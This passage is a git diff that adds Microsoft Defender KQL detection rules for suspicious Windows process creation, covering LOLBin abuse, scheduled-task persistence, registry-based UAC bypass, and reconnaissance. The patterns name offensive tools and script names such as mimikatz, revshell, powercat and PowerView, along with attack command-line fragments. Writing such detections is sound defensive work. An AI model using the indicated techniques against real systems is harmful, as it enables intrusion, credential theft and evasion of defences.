+| where (ProcessCommandLine contains "inject.ps1" or ProcessCommandLine contains "Invoke-CVE" or ProcessCommandLine contains "pupy.ps1" or ProcessCommandLine contains "payload.ps1" or ProcessCommandLine contains "beacon.ps1" or ProcessCommandLine contains "PowerView.ps1" or ProcessCommandLine contains "bypass.ps1" or ProcessCommandLine contains "obfuscated.ps1" or ProcessCommandLine contains "obfusc.ps1" or ProcessCommandLine contains "obfus.ps1" or ProcessCommandLine contains "obfs.ps1" or ProcessCommandLine contains "evil.ps1" or ProcessCommandLine contains "MiniDogz.ps1" or ProcessCommandLine contains "_enc.ps1" or ProcessCommandLine contains "\\shell.ps1" or ProcessCommandLine contains "\\rshell.ps1" or ProcessCommandLine contains "revshell.ps1" or ProcessCommandLine contains "\\av.ps1" or ProcessCommandLine contains "\\av_test.ps1" or ProcessCommandLine contains "adrecon.ps1" or ProcessCommandLine contains "mimikatz.ps1" or ProcessCommandLine contains "\\PowerUp_" or ProcessCommandLine contains "powerup.ps1" or ProcessCommandLine contains "\\Temp\\a.ps1" or ProcessCommandLine contains "\\Temp\\p.ps1" or ProcessCommandLine contains "\\Temp\\1.ps1" or ProcessCommandLine contains "Hound.ps1" or ProcessCommandLine contains "encode.ps1" or ProcessCommandLine contains "powercat.ps1") or ((FolderPath contains "\\CVE-202" or FolderPath contains "\\CVE202") or (FolderPath endswith "\\poc.exe" or FolderPath endswith "\\artifact.exe" or FolderPath endswith "\\artifact64.exe" or FolderPath endswith "\\artifact_protected.exe" or FolderPath endswith "\\artifact32.exe" or FolderPath endswith "\\artifact32big.exe" or FolderPath endswith "obfuscated.exe" or FolderPath endswith "obfusc.exe" or FolderPath endswith "\\meterpreter"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_provlaunch_exe_child_process.kql b/KQL/rules/windows/process_creation/suspicious_provlaunch_exe_child_process.kql
new file mode 100644
index 00000000..1ec6834d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_provlaunch_exe_child_process.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Provlaunch.EXE Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-08
+// Level: high
+// Description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\")) and InitiatingProcessFolderPath endswith "\\provlaunch.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_query_of_machineguid.kql b/KQL/rules/windows/process_creation/suspicious_query_of_machineguid.kql
new file mode 100644
index 00000000..757bb1ad
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_query_of_machineguid.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Query of MachineGUID
+// Author: frack113
+// Date: 2022-01-01
+// Level: low
+// Description: Use of reg to get MachineGuid information
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Cryptography" and ProcessCommandLine contains "/v " and ProcessCommandLine contains "MachineGuid") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_rasdial_activity.kql b/KQL/rules/windows/process_creation/suspicious_rasdial_activity.kql
new file mode 100644
index 00000000..c1b2a5d7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_rasdial_activity.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious RASdial Activity
+// Author: juju4
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects suspicious process related to rasdial.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059
+// False Positives:
+//   - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where FolderPath endswith "rasdial.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_rdp_redirect_using_tscon.kql b/KQL/rules/windows/process_creation/suspicious_rdp_redirect_using_tscon.kql
new file mode 100644
index 00000000..912a0f06
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_rdp_redirect_using_tscon.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious RDP Redirect Using TSCON
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-17
+// Level: high
+// Description: Detects a suspicious RDP session redirect using tscon.exe
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1563.002, attack.t1021.001, car.2013-07-002
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /dest:rdp-tcp#"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql b/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql
new file mode 100644
index 00000000..b4a46a64
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-10
+// Level: medium
+// Description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001
+// False Positives:
+//   - Administrative activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Get-LocalGroupMember " and (ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
new file mode 100644
index 00000000..d9a19b81
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: high
+// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and (not((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_recursive_takeown.kql b/KQL/rules/windows/process_creation/suspicious_recursive_takeown.kql
new file mode 100644
index 00000000..81a23a9c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_recursive_takeown.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Recursive Takeown
+// Author: frack113
+// Date: 2022-01-30
+// Level: medium
+// Description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1222.001
+// False Positives:
+//   - Scripts created by developers and admins
+//   - Administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/f " and ProcessCommandLine contains "/r") and FolderPath endswith "\\takeown.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_redirection_to_local_admin_share.kql b/KQL/rules/windows/process_creation/suspicious_redirection_to_local_admin_share.kql
new file mode 100644
index 00000000..5f4fcf52
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_redirection_to_local_admin_share.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Redirection to Local Admin Share
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-16
+// Level: high
+// Description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.t1048
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ">" and (ProcessCommandLine contains "\\\\127.0.0.1\\admin$\\" or ProcessCommandLine contains "\\\\localhost\\admin$\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_reg_add_bitlocker.kql b/KQL/rules/windows/process_creation/suspicious_reg_add_bitlocker.kql
new file mode 100644
index 00000000..56d1c284
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_reg_add_bitlocker.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Reg Add BitLocker
+// Author: frack113
+// Date: 2021-11-15
+// Level: high
+// Description: Detects suspicious addition to BitLocker related registry keys via the reg.exe utility
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1486
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "EnableBDEWithNoTPM" or ProcessCommandLine contains "UseAdvancedStartup" or ProcessCommandLine contains "UseTPM" or ProcessCommandLine contains "UseTPMKey" or ProcessCommandLine contains "UseTPMKeyPIN" or ProcessCommandLine contains "RecoveryKeyMessageSource" or ProcessCommandLine contains "UseTPMPIN" or ProcessCommandLine contains "RecoveryKeyMessage") and (ProcessCommandLine contains "REG" and ProcessCommandLine contains "ADD" and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\FVE" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "/f")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_reg_add_open_command.kql b/KQL/rules/windows/process_creation/suspicious_reg_add_open_command.kql
new file mode 100644
index 00000000..4903a241
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_reg_add_open_command.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Reg Add Open Command
+// Author: frack113
+// Date: 2021-12-20
+// Level: medium
+// Description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/ve " and ProcessCommandLine contains "/d") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "DelegateExecute") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_registry_modification_from_ads_via_regini_exe.kql b/KQL/rules/windows/process_creation/suspicious_registry_modification_from_ads_via_regini_exe.kql
new file mode 100644
index 00000000..20e2e203
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_registry_modification_from_ads_via_regini_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Registry Modification From ADS Via Regini.EXE
+// Author: Eli Salem, Sander Wiebing, oscd.community
+// Date: 2020-10-12
+// Level: high
+// Description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and ProcessCommandLine matches regex ":[^ \\\\]"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_regsvr32_execution_from_remote_share.kql b/KQL/rules/windows/process_creation/suspicious_regsvr32_execution_from_remote_share.kql
new file mode 100644
index 00000000..0e32de9b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_regsvr32_execution_from_remote_share.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Regsvr32 Execution From Remote Share
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-31
+// Level: high
+// Description: Detects REGSVR32.exe to execute DLL hosted on remote shares
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "\\REGSVR32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_remote_child_process_from_outlook.kql b/KQL/rules/windows/process_creation/suspicious_remote_child_process_from_outlook.kql
new file mode 100644
index 00000000..ea0fa1fc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_remote_child_process_from_outlook.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Remote Child Process From Outlook
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-12-27
+// Level: high
+// Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202
+
+DeviceProcessEvents
+| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\outlook.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_response_file_execution_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/suspicious_response_file_execution_via_odbcconf_exe.kql
new file mode 100644
index 00000000..9d59bb0c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_response_file_execution_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Response File Execution Via Odbcconf.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: high
+// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not((ProcessCommandLine contains ".rsp" or (ProcessCommandLine contains ".exe /E /F \"C:\\WINDOWS\\system32\\odbcconf.tmp\"" and FolderPath =~ "C:\\Windows\\System32\\odbcconf.exe" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\runonce.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_runas_like_flag_combination.kql b/KQL/rules/windows/process_creation/suspicious_runas_like_flag_combination.kql
new file mode 100644
index 00000000..bc5532ac
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_runas_like_flag_combination.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious RunAs-Like Flag Combination
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-11-11
+// Level: medium
+// Description: Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c cmd" or ProcessCommandLine contains " -c \"cmd" or ProcessCommandLine contains " -c powershell" or ProcessCommandLine contains " -c \"powershell" or ProcessCommandLine contains " --command cmd" or ProcessCommandLine contains " --command powershell" or ProcessCommandLine contains " -c whoami" or ProcessCommandLine contains " -c wscript" or ProcessCommandLine contains " -c cscript") and (ProcessCommandLine contains " -u system " or ProcessCommandLine contains " --user system " or ProcessCommandLine contains " -u NT" or ProcessCommandLine contains " -u \"NT" or ProcessCommandLine contains " -u 'NT" or ProcessCommandLine contains " --system " or ProcessCommandLine contains " -u administrator ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_rundll32_activity_invoking_sys_file.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_activity_invoking_sys_file.kql
new file mode 100644
index 00000000..ca52bdec
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_rundll32_activity_invoking_sys_file.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Rundll32 Activity Invoking Sys File
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-05
+// Level: high
+// Description: Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "rundll32.exe" and (ProcessCommandLine contains ".sys," or ProcessCommandLine contains ".sys ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_rundll32_execution_with_image_extension.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_execution_with_image_extension.kql
new file mode 100644
index 00000000..48fbf13d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_rundll32_execution_with_image_extension.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Rundll32 Execution With Image Extension
+// Author: Hieu Tran
+// Date: 2023-03-13
+// Level: high
+// Description: Detects the execution of Rundll32.exe with DLL files masquerading as image files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".cr2" or ProcessCommandLine contains ".eps" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".ico" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".nef" or ProcessCommandLine contains ".orf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".raw" or ProcessCommandLine contains ".sr2" or ProcessCommandLine contains ".tif" or ProcessCommandLine contains ".tiff") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_rundll32_invoking_inline_vbscript.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_invoking_inline_vbscript.kql
new file mode 100644
index 00000000..b46e149a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_rundll32_invoking_inline_vbscript.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Rundll32 Invoking Inline VBScript
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-05
+// Level: high
+// Description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "Execute" and ProcessCommandLine contains "RegRead" and ProcessCommandLine contains "window.close"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_rundll32_setupapi_dll_activity.kql b/KQL/rules/windows/process_creation/suspicious_rundll32_setupapi_dll_activity.kql
new file mode 100644
index 00000000..005aff3c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_rundll32_setupapi_dll_activity.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Rundll32 Setupapi.dll Activity
+// Author: Konstantin Grishchenko, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+//   - Scripts and administrative tools that use INF files for driver installation with setupapi.dll
+
+DeviceProcessEvents
+| where FolderPath endswith "\\runonce.exe" and (InitiatingProcessCommandLine contains "setupapi.dll" and InitiatingProcessCommandLine contains "InstallHinfSection") and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_runscripthelper_exe.kql b/KQL/rules/windows/process_creation/suspicious_runscripthelper_exe.kql
new file mode 100644
index 00000000..d4bcb169
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_runscripthelper_exe.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Runscripthelper.exe
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects execution of powershell scripts via Runscripthelper.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "surfacecheck" and FolderPath endswith "\\Runscripthelper.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_scan_loop_network.kql b/KQL/rules/windows/process_creation/suspicious_scan_loop_network.kql
new file mode 100644
index 00000000..909af7df
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_scan_loop_network.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Scan Loop Network
+// Author: frack113
+// Date: 2022-03-12
+// Level: medium
+// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018
+// False Positives:
+//   - Legitimate script
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "for " or ProcessCommandLine contains "foreach ") and (ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "ping")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_involving_temp_folder.kql b/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_involving_temp_folder.kql
new file mode 100644
index 00000000..2ed0fc11
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_involving_temp_folder.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Scheduled Task Creation Involving Temp Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-11
+// Level: high
+// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005
+// False Positives:
+//   - Administrative activity
+//   - Software installation
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /create " and ProcessCommandLine contains " /sc once " and ProcessCommandLine contains "\\Temp\\") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql b/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql
new file mode 100644
index 00000000..0965c137
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Scheduled Task Creation via Masqueraded XML File
+// Author: Swachchhanda Shrawan Poudel, Elastic (idea)
+// Date: 2023-04-20
+// Level: medium
+// Description: Detects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.defense-evasion, attack.persistence, attack.t1036.005, attack.t1053.005
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "/create" or ProcessCommandLine contains "-create") and (ProcessCommandLine contains "/xml" or ProcessCommandLine contains "-xml") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains ".xml" or ((InitiatingProcessCommandLine contains ":\\WINDOWS\\Installer\\MSI" and InitiatingProcessCommandLine contains ".tmp,zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\rundll32.exe") or (ProcessIntegrityLevel in~ ("System", "S-1-16-16384"))))) and (not(((InitiatingProcessFolderPath contains ":\\ProgramData\\OEM\\UpgradeTool\\CareCenter_" and InitiatingProcessFolderPath contains "\\BUnzip\\Setup_msi.exe") or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Dell\\SupportAssist\\pcdrcui.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_scheduled_task_name_as_guid.kql b/KQL/rules/windows/process_creation/suspicious_scheduled_task_name_as_guid.kql
new file mode 100644
index 00000000..0d94fa9e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_scheduled_task_name_as_guid.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Scheduled Task Name As GUID
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-31
+// Level: medium
+// Description: Detects creation of a scheduled task with a GUID like name
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+//   - Legitimate software naming their tasks as GUIDs
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "}\"" or ProcessCommandLine contains "}'" or ProcessCommandLine contains "} ") and (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "/TN \"{" or ProcessCommandLine contains "/TN '{" or ProcessCommandLine contains "/TN {")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_schtasks_execution_appdata_folder.kql b/KQL/rules/windows/process_creation/suspicious_schtasks_execution_appdata_folder.kql
new file mode 100644
index 00000000..371ae1d7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_schtasks_execution_appdata_folder.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Schtasks Execution AppData Folder
+// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-03-15
+// Level: high
+// Description: Detects the creation of a schtask that executes a file from C:\Users\<USER>\AppData\Local
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/TR" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\schtasks.exe") and (not((ProcessCommandLine contains "/TN TVInstallRestore" and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "TeamViewer_.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_type_with_high_privileges.kql b/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_type_with_high_privileges.kql
new file mode 100644
index 00000000..766acfaf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_type_with_high_privileges.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Schtasks Schedule Type With High Privileges
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-31
+// Level: medium
+// Description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
+// False Positives:
+//   - Some installers were seen using this method of creation unfortunately. Filter them in your environment
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_types.kql b/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_types.kql
new file mode 100644
index 00000000..8cc509c2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/suspicious_schtasks_schedule_types.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Schtasks Schedule Types
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects scheduled task creations or modification on a suspicious schedule type
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005
